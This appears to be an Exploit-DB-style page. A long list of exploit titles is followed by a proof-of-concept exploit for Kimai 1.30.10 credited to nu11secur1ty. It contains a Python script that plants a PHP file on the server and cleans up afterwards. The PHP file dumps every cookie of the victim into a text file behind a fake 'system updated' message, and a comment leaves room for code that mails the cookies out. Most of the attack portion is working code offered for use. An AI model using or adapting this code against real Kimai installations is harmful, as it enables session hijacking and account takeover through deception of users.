d7c9ba572a
50 changes to exploits/shellcodes/ghdb Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection Osprey Pump Controller 1.0.1 - Administrator Backdoor Access Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE HospitalRun 1.0.0-beta - Local Root Exploit for macOS Adobe Connect 10 - Username Disclosure craftercms 4.x.x - CORS EasyNas 1.1.0 - OS Command Injection Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE) Art Gallery Management System Project in PHP v 1.0 - SQL injection atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE Auto Dealer Management System 1.0 - Broken Access Control Exploit Auto Dealer Management System v1.0 - SQL Injection Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php Auto Dealer Management System v1.0 - SQL Injection on manage_user.php Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload Best pos Management System v1.0 - SQL Injection ChurchCRM v4.5.3-121fcc1 - SQL Injection Dompdf 1.2.1 - Remote Code Execution (RCE) Employee Task Management System v1.0 - Broken Authentication Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?) Employee Task Management System v1.0 - SQL Injection on edit-task.php flatnux 2021-03.25 - Remote Code Execution (Authenticated) Intern Record System v1.0 - SQL Injection (Unauthenticated) Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking LDAP Tool Box Self Service Password v1.5.2 - Account takeover Music Gallery Site v1.0 - Broken Access Control Music Gallery Site v1.0 - SQL Injection on music_list.php Music Gallery Site v1.0 - SQL Injection on page Master.php Music Gallery Site v1.0 - SQL Injection on page view_music_details.php POLR URL 2.3.0 - Shortener Admin Takeover Purchase Order Management-1.0 - Local File Inclusion Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) modoboa 2.0.4 - Admin TakeOver pdfkit v0.8.7.2 - Command Injection FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking Windows 11 10.0.22000 - Backup service Privilege Escalation TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE) Unified Remote 3.13.0 - Remote Code Execution (RCE)
88 lines
No EOL
2.7 KiB
Text
88 lines
No EOL
2.7 KiB
Text
## Exploit Title: Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking
|
|
## Author: nu11secur1ty
|
|
## Date: 02.23.2023
|
|
## Vendor: https://www.kimai.org/
|
|
## Software: https://github.com/kimai/kimai/releases/tag/1.30.10
|
|
## Reference: https://www.thesslstore.com/blog/the-ultimate-guide-to-session-hijacking-aka-cookie-hijacking/
|
|
## Reference: https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions
|
|
|
|
## Description:
|
|
The Kimai-1.30.10 is vulnerable to
|
|
SameSite-Cookie-Vulnerability-session-hijacking.
|
|
The attacker can trick the victim to update or upgrade the system, by
|
|
using a very malicious exploit to steal his vulnerable cookie and get
|
|
control of his session.
|
|
|
|
STATUS: HIGH Vulnerability
|
|
|
|
[+]Exploit:
|
|
## WARNING: The EXPLOIT IS FOR ADVANCED USERS!
|
|
This is only one example:
|
|
```python
|
|
#!/usr/bin/python
|
|
import os
|
|
import webbrowser
|
|
import time
|
|
|
|
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/en/login')
|
|
input("After you log in please press any key to continue...")
|
|
os.system("copy Update.php
|
|
C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\")
|
|
time.sleep(3)
|
|
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/Update.php')
|
|
time.sleep(3)
|
|
os.system("copy
|
|
C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt
|
|
C:\\Users\\venvaropt\\Desktop\\Kimai-1.30.10\\PoC\\")
|
|
# Your mail-sending code must be here ;)
|
|
time.sleep(7)
|
|
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt")
|
|
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\Update.php")
|
|
|
|
```
|
|
-----------------------------------------
|
|
```PHP
|
|
<?php
|
|
//echo '<pre>';
|
|
// print_r( $_COOKIE );
|
|
//die();
|
|
|
|
$fp = fopen('PoC.txt', 'w');
|
|
fwrite($fp, print_r($_COOKIE, TRUE));
|
|
fclose($fp);
|
|
echo "DONE: Now you are already updated! Enjoy your system Kimai
|
|
1.30.10 stable (Ayumi)";
|
|
?>
|
|
```
|
|
|
|
## Reproduce:
|
|
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kimai/2023/Kimai-1.30.10)
|
|
|
|
## Proof and Exploit:
|
|
[href](https://streamable.com/md9fmr)
|
|
|
|
## Time spend:
|
|
03:00:00
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at
|
|
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
|
|
https://www.exploit-db.com/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/>
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/> |